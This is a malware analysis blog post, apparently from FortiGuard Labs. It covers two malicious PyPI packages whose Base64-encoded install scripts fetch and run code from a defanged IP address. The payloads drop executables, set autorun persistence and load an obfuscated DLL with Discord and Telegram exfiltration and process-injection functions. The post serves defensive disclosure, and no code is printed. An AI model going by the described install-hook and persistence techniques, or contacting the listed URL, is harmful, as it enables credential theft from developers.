FortiGuard Labs Threat Research

More Supply Chain Attacks via New Malicious Python Packages in PyPi

By Jin Lee | February 20, 2023

The FortiGuard Labs team has discovered another 0-day attack in the PyPI packages (Python Package Index) by the malware authors ‘Portugal’ and ‘Brazil’ who published the packages ‘xhttpsp’ and ‘httpssp’. These two packages were discovered on January 31, 2023, by monitoring an open-source ecosystem. They were both published on January 27, 2023. Each included one version and an empty description, as shown below.

Figure 1: Package ‘xhttpsp’ author information

Figure 2: Project description of ‘xhttpsp’

Figure 3: Package release history of ‘xhttpsp’

Figure 4: Package ‘httpssp’ author information

Figure 5: Project description of ‘httpssp’

Figure 6: Package release history of ‘httpssp’

The two packages included the same malicious code in their installation script, which appears to be encoded with Base64.

Figure 7: script

When we decoded the encoded string, we found python code, some of which are shown below.

Figure 8: Decoded string

Within the string, we find an interesting URL, ‘http://54[.]237[.]36[.]60/inject/QrvxFGKvsSJ5E5bx', which the malware reads and then writes to a file to execute.

This URL has not previously been detected by any other threat researchers.

Figure 9: The URL has not been detected by VirusTotal

When accessing the URL, we found heavily obfuscated code, shown below.

Figure 10: Contents of the URL ‘http://54[.]237[.]36[.]60/inject/QrvxFGKvsSJ5E5bx’


When we execute the decoded code from Figure 8, we notice that it drops a file to an arbitrary location with a random name and extension. This may be due to changes in the code every time the URL is refreshed. In this case, it drops the file to ‘%USER%\AppData\Local\Temp’ as ‘yzulmvnb.jpg’ and sets a registry key for auto-run.

Figure 11: Dropped file

Figure 12: Autorun set at startup

When examining the dropped file, we observe that it is another script similar to the one shown in the URL contents.

Figure 13: Contents of the dropped file

Let’s try executing this dropped file.

Figure 14: Dropped file running

One suspicious behavior when executing this file is that it drops a binary executable file to the ‘%USER%’ folder as ‘update.exe’.

Figure 15: Dropped executable file update.exe

A handful of vendors flag this dropped executable file as malicious (SHA 256):


Figure 16: Vendors that detect the dropped executable file update.exe

As shown in Figure 14, it then runs a Powershell, which is another suspicious behavior. It also copies itself to ‘%USER%\AppData\Roaming\Google’ as ‘Chrome.exe’ and sets autorun for this copied executable.

Figure 17: Dropped copy as Chrome.exe
Figure 18: Autorun set at startup for Chrome.exe

When we dive into the ‘update.exe’ code, we see a binary embedded within it, as shown below.

Figure 19: Snippet of code of binary embedded in update.exe in dnSpy

Figure 20: Snippet of code of update.exe in dnSpy

The embedded binary is a .dll file. As shown in the VirusTotal entry below, many vendors flag this binary, ‘Rdudkye.dll,’ as malicious (SHA 256):


Figure 21: Vendors that detect the binary Rdudkye.dll

While the code is very obfuscated, some functions give clues about what it may do or its capabilities. We can see some interesting functions such as DiscordApi, TelegramApi, Inject, ProcessHollowing, RemoteThreadInjection, HiddenStartup, etc.

Figure 22: Snippet of functions of Rdudkye.dll in dnSpy

This blog shows that although the malicious python script may appear simple, it is more complex than it seems with multiple layers. With just a simple copy and paste of a brief code, malware authors are able to easily distribute malicious packages to steal or exfiltrate sensitive data through platforms such as Discord and Telegram. A good indication of a malicious package is when a lot of obfuscation is involved. This technique is quite common among malware authors, so it may be a wise idea for Python end users to check twice for this before using new packages.  


Fortinet Protections

FortiGuard Labs notified Python Package Index administrators about this malicious package, and they have confirmed that it has been taken down.

FortiGuard AntiVirus detects the malicious executables identified in this report as

update.exe: MSIL/Agent.OQX!tr.dldr

Rdudkye.dll: MSIL/Kryptik.AGJS!tr

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.

The FortiGuard Web Filtering Service detects the download URLs cited in this report as Malicious and blocks them.







Malicious URLs


Learn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard AI-powered security services portfolio.